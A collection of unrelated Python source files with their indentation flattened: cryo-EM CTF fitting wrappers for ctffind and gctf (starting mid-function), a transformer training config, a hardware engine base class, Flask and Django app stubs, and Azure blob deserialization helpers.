image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
# find ctf of the current image or stack
for image_in_stack_ind in range(z_dim):
# extract and save images if needed
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
# save image path retlated
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
# find ctf
if tool == 'ctffind':
# ctffind
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
# gctf
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
plot_ctf=plot_ctf, plot_ps=plot_ps ,b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
# save gctf specific data
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
raise ValueError("Sorry tool: " + tool + " was not found.")
# save data common for ctffind and gctf
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
# keep track of n images processed so far
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
# plot phases
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
plt.ylabel('Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
# plot defocus
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
plt.ylabel('Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
# plot resolution
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
@classmethod
def ctffind(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='ctffind', param_file='ctf_params.txt', fast=False,
print_results=True, print_head=True,
plot_ctf=True, show_legend=True):
"""
Determines and shows CTF fits of one image using ctffind.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# default params ctffind 4.0.17 (moved to top of this file anyway)
#default_params = {
# "pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
# 'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
# 'def_step':500, 'astig':100, 'phase':'no', 'min_phase':0,
# 'max_phase':2, 'phase_step':0.1}
#param_names = [
# 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
# 'min_def', 'max_def', 'def_step', 'astig', 'phase',
# 'min_phase', 'max_phase', 'phase_step']
# keep params if list, add default if dict
if isinstance(params, list):
comb_params = [pixel_a] + params
elif isinstance(params, dict):
params_dict = cls.default_params_ctffind.copy()
params_dict.update(params)
params_dict['pixel_a'] = pixel_a
param_names = cls.make_param_names_ctffind(params=params_dict)
comb_params = [params_dict[name] for name in param_names]
# set ctffind out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')
# wite ctf parameters to a file
param_path = os.path.join(ctf_dir, param_file)
pf = open(param_path, 'w')
pf.write(image_path + '\n')
pf.write(ctf_path + '\n')
str_params = [str(par) + '\n' for par in comb_params]
pf.writelines(str_params)
pf.flush()
# execute ctffind
# shell commands that work:
# - ctffind < param_path
# - cat params.txt | ctffind
#print(image)
if fast:
ctf_cmd = [executable, '--fast']
else:
ctf_cmd = [executable]
try:
subprocess.check_call(ctf_cmd, stdin=open(param_path))
except Exception as exc:
# workaround for ctffind command returning code 255 (4.1.8, 09.2018)
logging.debug('CalledProcessError: ' + str(exc))
# read results:
ctf_txt = np.loadtxt(ctf_txt_path)
results = {
"defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
"angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
"ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
'pixel_a':pixel_a}
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['ctf_path'] = ctf_path
# prepare header for defoci and phases
if print_head:
left_space = ' ' * old_div((len(image_name) - 5), 2)
right_space = ' ' *old_div ((len(image_name) - 4), 2)
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# plot ctf
if plot_ctf:
plt.figure()
avrot_data = np.loadtxt(ctf_avrot_path)
x_data = avrot_data[0] / pixel_a
plt.plot(x_data, avrot_data[2], 'g-', label='PS')
plt.plot(
x_data, avrot_data[3], color='orange', linewidth=2,
label='CTF fit')
plt.plot(
x_data, avrot_data[4], color='blue', linewidth=2,
label='Quality')
plt.ylim(-0.1, 1.1)
plt.xlabel("Spatial frequency [1/A])")
plt.ylabel("Amplitude")
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def make_param_names_ctffind(cls, params):
"""
Makes a list of parameter names that's suitable for ctffind 4.1 and
it is in accordance with the specified params.
Argument:
- params: dict of parameters
Returns parameter list
"""
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
"""
Determines and shows CTF fits of one image using gctf.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack if needed
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# prepare parameters
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
#print(params_list)
# execute ctffind
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
# set gctf out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
# move generated files to ctf_dir
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
# read results
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
# read defocus
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
#print line.strip('\n')
elif in_last_cycle and (line.find('Defocus_U') >= 0):
#print line.strip('\n')
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
#print line.strip('\n')
data_split = line.strip().split()[:-2]
in_last_cycle_data = False
# read res limit and b factor
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
# read validation
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
# extract results
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
#print(results_native)
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
#if results.get("phase") is None: results["phase"] = 0
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
# prepare header for defoci and phases
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# add validation to header and results
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# print validation
if print_validation:
for val_line in validation_lines:
print(val_line)
# plot ctf
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
#if show_legend: plt.legend()
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
# return
return results
@classmethod
def read_pixel_size(cls, image_path):
"""
Reads pixel size from an image file.
Raises ValueError if pixel size can not be read from the image
Argument:
- image_path: image path
Returns: pixel size in A
"""
image_io = ImageIO()
if image_path.endswith('.st'):
image_io.readHeader(file=image_path, fileFormat='mrc')
else:
image_io.readHeader(file=image_path)
if image_io.pixel is not None:
if isinstance(image_io.pixel, (list, tuple)):
pixel_a = 10 * image_io.pixel[0]
else:
pixel_a = 10 * image_io.pixel
else:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
# in case of 0 pix size
if pixel_a == 0:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
"""
Flattens image stack, that is sums up all z-slices and writes
the resulting (flat) image).
Arguments:
- stack_path: path to the image stack
- flat_path: path where the resulting image is saved
Returns resulting image path
"""
# parse stack path
stack_dir, stack_name = os.path.split(stack_path)
stack_base, stack_extension = stack_name.rsplit('.', 1)
if stack_extension == 'st':
stack_extension = 'mrc'
file_format = 'mrc'
else:
file_format = None
# read, flatten and write
flat_path = os.path.join(
flat_dir, stack_base + '_flat.' + stack_extension)
frame = Image.read(file=stack_path, fileFormat=file_format)
frame.data = np.sum(frame.data, axis=2, dtype=frame.data.dtype)
frame.write(file=flat_path, pixel=frame.pixelsize)
return flat_path
|
from multiprocessing import cpu_count
TEMP_DIRECTORY = "temp/data"
TRAIN_FILE = "train.tsv"
TEST_FILE = "test.tsv"
DEV_RESULT_FILE = "dev_result.tsv"
DEV_EVAL_FILE = 'dev_eval.txt'
RESULT_FILE = "result.csv"
SUBMISSION_FOLDER = "transformers"
SUBMISSION_FILE = "transformers"
MODEL_TYPE = "xlmroberta"
MODEL_NAME = "xlm-roberta-large"
LANGUAGE_FINETUNE =False
SEED = 777
# training instances = 7000 > if batch size=8, batches = 875 > evaluate during training steps -> 80 or 175
args = {
'output_dir': 'temp/outputs/',
"best_model_dir": "temp/outputs/best_model",
'cache_dir': 'temp/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 128, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 3,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'n_fold': 3,
'logging_steps': 60,
'save_steps': 60,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 60,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
language_modeling_args = {
'output_dir': 'temp/lm/outputs/',
"best_model_dir": "temp/lm/outputs/best_model",
'cache_dir': 'temp/lm/cache_dir/',
'fp16': False,
'fp16_opt_level': 'O1',
'max_seq_length': 152, # 128
'train_batch_size': 8,
'gradient_accumulation_steps': 1,
'eval_batch_size': 8,
'num_train_epochs': 2,
'weight_decay': 0,
'learning_rate': 1e-5,
'adam_epsilon': 1e-8,
'warmup_ratio': 0.06,
'warmup_steps': 0,
'max_grad_norm': 1.0,
'do_lower_case': False,
'logging_steps': 80,
'save_steps': 80,
"no_cache": False,
"no_save": False,
"save_recent_only": True,
'save_model_every_epoch': True,
'evaluate_during_training': True,
"evaluate_during_training_silent": True,
'evaluate_during_training_steps': 80,
"evaluate_during_training_verbose": True,
'use_cached_eval_features': False,
"save_best_model": True,
'save_eval_checkpoints': True,
'tensorboard_dir': None,
"save_optimizer_and_scheduler": True,
'overwrite_output_dir': True,
'reprocess_input_data': True,
'process_count': cpu_count() - 2 if cpu_count() > 2 else 1,
'n_gpu': 1,
'use_multiprocessing': True,
"multiprocessing_chunksize": 500,
'silent': False,
'wandb_project': None,
'wandb_kwargs': {},
"use_early_stopping": True,
"early_stopping_patience": 10,
"early_stopping_delta": 0,
"early_stopping_metric": "eval_loss",
"early_stopping_metric_minimize": True,
"early_stopping_consider_epochs": False,
"manual_seed": SEED,
"config": {},
"local_rank": -1,
"encoding": None,
}
|
from .module import * # noqa
from .models import Trail, Hop # noqa
|
import logging
log = logging.getLogger(__name__)
import threading
import numpy as np
from atom.api import (Unicode, Float, Bool, observe, Property, Int, Typed,
Long, Value)
from enaml.core.api import Declarative, d_
from psi.core.enaml.api import PSIContribution
from ..util import copy_declarative
from .channel import (Channel, AnalogMixin, DigitalMixin, HardwareMixin,
SoftwareMixin, OutputMixin, InputMixin, CounterMixin)
def log_configuration(engine):
info = ['Engine configuration']
info.append('Engine {}'.format(engine.name))
for channel in engine.get_channels(direction='input', active=True):
info.append('\t channel {}'.format(channel.name))
for i in channel.inputs:
info.append('\t\t input {}'.format(i.name))
for channel in engine.get_channels(direction='output', active=True):
info.append('\t channel {}'.format(channel.name))
for o in channel.outputs:
info.append('\t\t output {}'.format(o.name))
log.info('\n'.join(info))
class Engine(PSIContribution):
'''
Defines hardware-specific interface
The user-defind attributes are ones set by the end-user of this library in
their IO manifest. The IO manifest is system specific and describes the
hardware they are using for data acquisition.
User-defined attributes
-----------------------
name : string
Name of the engine. Must be unique across all engines. This name is
used for debugging and metadata purposes.
master_clock : bool
If true, this engine will provide a timestamp whenever it's requested
via `get_ts`. This is typically used for software-timed events (events
generated by the hardware will typically have a timestamp that's
determined by the engine that controls that particular device).
hw_ai_monitor_period : float (sec)
Poll period (in seconds). This defines how quickly acquired (analog
input) data is downloaded from the buffers (and made available to
listeners). If you want to see data as soon as possible, set the poll
period to a small value. If your application is stalling or freezing,
set this to a larger value. This poll period is a suggestion, not a
contract.
hw_ao_monitor_period : float (sec)
Poll period (in seconds). This defines how often callbacks for the
analog outputs are notified (i.e., to generate additional samples for
playout). If the poll period is too long, then the analog output may
run out of samples. This poll period is a suggestion, not a contract.
Attributes
----------
configured : bool
True if the hardware has been configured.
Notes
-----
When subclassing, you only need to implement the callbacks required by your
hardware. For example, if your hardware only has analog inputs, you only
need to implement the analog input methods.
'''
name = d_(Unicode()).tag(metadata=True)
master_clock = d_(Bool(False)).tag(metadata=True)
lock = Value()
configured = Bool(False)
hw_ai_monitor_period = d_(Float(0.1)).tag(metadata=True)
hw_ao_monitor_period = d_(Float(1)).tag(metadata=True)
def _default_lock(self):
return threading.Lock()
def get_channels(self, mode=None, direction=None, timing=None,
active=True):
'''
Return channels matching criteria
Parameters
----------
mode : {None, 'analog', 'digital'
Type of channel
direction : {None, 'input, 'output'}
Direction
timing : {None, 'hardware', 'software'}
Hardware or software-timed channel. Hardware-timed channels have a
sampling frequency greater than 0.
active : bool
If True, return only channels that have configured inputs or
outputs.
'''
channels = [c for c in self.children if isinstance(c, Channel)]
if active:
channels = [c for c in channels if c.active]
if timing is not None:
if timing in ('hardware', 'hw'):
channels = [c for c in channels if isinstance(c, HardwareMixin)]
elif timing in ('software', 'sw'):
channels = [c for c in channels if isinstance(c, SoftwareMixin)]
else:
raise ValueError('Unsupported timing')
if direction is not None:
if direction in ('input', 'in'):
channels = [c for c in channels if isinstance(c, InputMixin)]
elif direction in ('output', 'out'):
channels = [c for c in channels if isinstance(c, OutputMixin)]
else:
raise ValueError('Unsupported direction')
if mode is not None:
if mode == 'analog':
channels = [c for c in channels if isinstance(c, AnalogMixin)]
elif mode == 'digital':
channels = [c for c in channels if isinstance(c, DigitalMixin)]
elif mode == 'counter':
channels = [c for c in channels if isinstance(c, CounterMixin)]
else:
raise ValueError('Unsupported mode')
return tuple(channels)
def get_channel(self, channel_name):
channels = self.get_channels(active=False)
for channel in channels:
if channel.name == channel_name:
return channel
m = '{} channel does not exist'.format(channel_name)
raise AttributeError(m)
def remove_channel(self, channel):
channel.set_parent(None)
def configure(self):
log_configuration(self)
for channel in self.get_channels():
log.debug('Configuring channel {}'.format(channel.name))
channel.configure()
self.configured = True
def register_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_ai_callback(self, callback, channel_name=None):
raise NotImplementedError
def unregister_et_callback(self, callback, channel_name=None):
raise NotImplementedError
def register_done_callback(self, callback):
raise NotImplementedError
def write_hw_ao(self, data, offset, timeout=1):
'''
Write hardware-timed analog output data to the buffer
Parameters
----------
data : 2D array
Data to write (format channel x time)
offset : int
Sample at which to start writing data. Sample is relative to
beginning of data acquisition. This can overwrite data that has
already been written to the buffer but not consumed by the
hardware.
timeout : float
Time, in seconds, to keep trying to write the data before failing.
Notes
-----
When subclassing, raise an exception if the system attempts to write
data beginning at an offset that has already been consumed by the
hardware and cannot be modified.
'''
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def start(self):
raise NotImplementedError
def stop(self):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def get_ts(self):
raise NotImplementedError
def get_buffer_size(self, channel_name):
raise NotImplementedError
def get_offset(self, channel_name):
raise NotImplementedError
def update_hw_ao_multiple(self, offsets, channel_names, method):
raise NotImplementedError
def update_hw_ao(self, offsets, channel_name, method):
raise NotImplementedError
def clone(self, channel_names=None):
'''
Return a copy of this engine with specified channels included
This is intended as a utility function to assist various routines that
may need to do a quick operation before starting the experiment. For
example, calibration may only need to run a subset of the channels.
'''
new = copy_declarative(self)
if channel_names is not None:
for channel_name in channel_names:
channel = self.get_channel(channel_name)
copy_declarative(channel, parent=new)
return new
|
"""Models for final hackbright project """
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
app = Flask(__name__)
class Legislator(db.Model):
""" Info on current legislators. """
__tablename__ = "current_legislators"
legislator_id = db.Column(db.Integer, autoincrement=True, primary_key=True)
last_name = db.Column(db.String(25), nullable=False)
full_name = db.Column(db.String(200), nullable=False)
state = db.Column(db.String(20), nullable=False)
party = db.Column(db.String(50), nullable=False)
opensecrets_id = db.Column(db.String(10), nullable=True)
govtrack_id = db.Column(db.Integer, nullable=False)
votesmart_id = db.Column(db.Integer, nullable=True)
phone = db.Column(db.String(25), nullable=True)
website = db.Column(db.String(150), nullable=True)
def __repr__(self):
""" provide info on legislator."""
return f"Legislator: {self.full_name} party: {self.party}"
##### getting direction from Testing lab below #####
def testing_data():
""" create sample data for running tests """
legis = Legislator(last_name="Smith", full_name="Jane Smith", state="LA",
party="Democrat", opensecrets_id="N00003535",
govtrack_id=400050, votesmart_id=27018,
phone="504-555-5555", website="wwww.google.com")
db.session.add(legis)
db.session.commit()
def connect_to_db(app, db_uri="postgresql:///legislature"):
""" Connect database to Flask app."""
# Configure to use my PstgreSQL database
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.app = app
db.init_app(app)
if __name__ == "__main__":
# if I run this module interactively, it will leave
# me in a state of being able to work with the database directly.
from server import app
connect_to_db(app)
print("Connected to DB.")
|
"""clothes_shop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^products/', include('products.urls')),
url(r'^admin/', admin.site.urls),
]
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
# pylint: disable=no-self-use
from typing import ( # pylint: disable=unused-import
Tuple, Dict, List,
TYPE_CHECKING
)
try:
from urllib.parse import unquote
except ImportError:
from urllib import unquote
from ._models import BlobType, CopyProperties, ContentSettings, LeaseProperties, BlobProperties, ImmutabilityPolicy
from ._shared.models import get_enum_value
from ._shared.response_handlers import deserialize_metadata
from ._models import ContainerProperties, BlobAnalyticsLogging, Metrics, CorsRule, RetentionPolicy, \
StaticWebsite, ObjectReplicationPolicy, ObjectReplicationRule
if TYPE_CHECKING:
from ._generated.models import PageList
def deserialize_pipeline_response_into_cls(cls_method, response, obj, headers):
try:
deserialized_response = response.http_response
except AttributeError:
deserialized_response = response
return cls_method(deserialized_response, obj, headers)
def deserialize_blob_properties(response, obj, headers):
blob_properties = BlobProperties(
metadata=deserialize_metadata(response, obj, headers),
object_replication_source_properties=deserialize_ors_policies(response.http_response.headers),
**headers
)
if 'Content-Range' in headers:
if 'x-ms-blob-content-md5' in headers:
blob_properties.content_settings.content_md5 = headers['x-ms-blob-content-md5']
else:
blob_properties.content_settings.content_md5 = None
return blob_properties
def deserialize_ors_policies(policy_dictionary):
if policy_dictionary is None:
return None
# For source blobs (blobs that have policy ids and rule ids applied to them),
# the header will be formatted as "x-ms-or-<policy_id>_<rule_id>: {Complete, Failed}".
# The value of this header is the status of the replication.
or_policy_status_headers = {key: val for key, val in policy_dictionary.items()
if 'or-' in key and key != 'x-ms-or-policy-id'}
parsed_result = {}
for key, val in or_policy_status_headers.items():
# list blobs gives or-policy_rule and get blob properties gives x-ms-or-policy_rule
policy_and_rule_ids = key.split('or-')[1].split('_')
policy_id = policy_and_rule_ids[0]
rule_id = policy_and_rule_ids[1]
# If we are seeing this policy for the first time, create a new list to store rule_id -> result
parsed_result[policy_id] = parsed_result.get(policy_id) or list()
parsed_result[policy_id].append(ObjectReplicationRule(rule_id=rule_id, status=val))
result_list = [ObjectReplicationPolicy(policy_id=k, rules=v) for k, v in parsed_result.items()]
return result_list
def deserialize_blob_stream(response, obj, headers):
blob_properties = deserialize_blob_properties(response, obj, headers)
obj.properties = blob_properties
return response.http_response.location_mode, obj
def deserialize_container_properties(response, obj, headers):
metadata = deserialize_metadata(response, obj, headers)
container_properties = ContainerProperties(
metadata=metadata,
**headers
)
return container_properties
def get_page_ranges_result(ranges):
# type: (PageList) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]]
page_range = [] # type: ignore
clear_range = [] # type: List
if ranges.page_range:
page_range = [{'start': b.start, 'end': b.end} for b in ranges.page_range] # type: ignore
if ranges.clear_range:
clear_range = [{'start': b.start, 'end': b.end} for b in ranges.clear_range]
return page_range, clear_range # type: ignore
def service_stats_deserialize(generated):
"""Deserialize a ServiceStats objects into a dict.
"""
return {
'geo_replication': {
'status': generated.geo_replication.status,
'last_sync_time': generated.geo_replication.last_sync_time,
}
}
def service_properties_deserialize(generated):
"""Deserialize a ServiceProperties objects into a dict.
"""
return {
'analytics_logging': BlobAnalyticsLogging._from_generated(generated.logging), # pylint: disable=protected-access
'hour_metrics': Metrics._from_generated(generated.hour_metrics), # pylint: disable=protected-access
'minute_metrics': Metrics._from_generated(generated.minute_metrics), # pylint: disable=protected-access
'cors': [CorsRule._from_generated(cors) for cors in generated.cors], # pylint: disable=protected-access
'target_version': generated.default_service_version, # pylint: disable=protected-access
'delete_retention_policy': RetentionPolicy._from_generated(generated.delete_retention_policy), # pylint: disable=protected-access
'static_website': StaticWebsite._from_generated(generated.static_website), # pylint: disable=protected-access
}
def get_blob_properties_from_generated_code(generated):
blob = BlobProperties()
if generated.name.encoded:
blob.name = unquote(generated.name.content)
else:
blob.name = generated.name.content
blob_type = get_enum_value(generated.properties.blob_type)
blob.blob_type = BlobType(blob_type) if blob_type else None
blob.etag = generated.properties.etag
blob.deleted = generated.deleted
blob.snapshot = generated.snapshot
blob.is_append_blob_sealed = generated.properties.is_sealed
blob.metadata = generated.metadata.additional_properties if generated.metadata else {}
blob.encrypted_metadata = generated.metadata.encrypted if generated.metadata else None
blob.lease = LeaseProperties._from_generated(generated) # pylint: disable=protected-access
blob.copy = CopyProperties._from_generated(generated) # pylint: disable=protected-access
blob.last_modified = generated.properties.last_modified
blob.creation_time = generated.properties.creation_time
blob.content_settings = ContentSettings._from_generated(generated) # pylint: disable=protected-access
blob.size = generated.properties.content_length
blob.page_blob_sequence_number = generated.properties.blob_sequence_number
blob.server_encrypted = generated.properties.server_encrypted
blob.encryption_scope = generated.properties.encryption_scope
blob.deleted_time = generated.properties.deleted_time
blob.remaining_retention_days = generated.properties.remaining_retention_days
blob.blob_tier = generated.properties.access_tier
blob.rehydrate_priority = generated.properties.rehydrate_priority
blob.blob_tier_inferred = generated.properties.access_tier_inferred
blob.archive_status = generated.properties.archive_status
blob.blob_tier_change_time = generated.properties.access_tier_change_time
blob.version_id = generated.version_id
blob.is_current_version = generated.is_current_version
blob.tag_count = generated.properties.tag_count
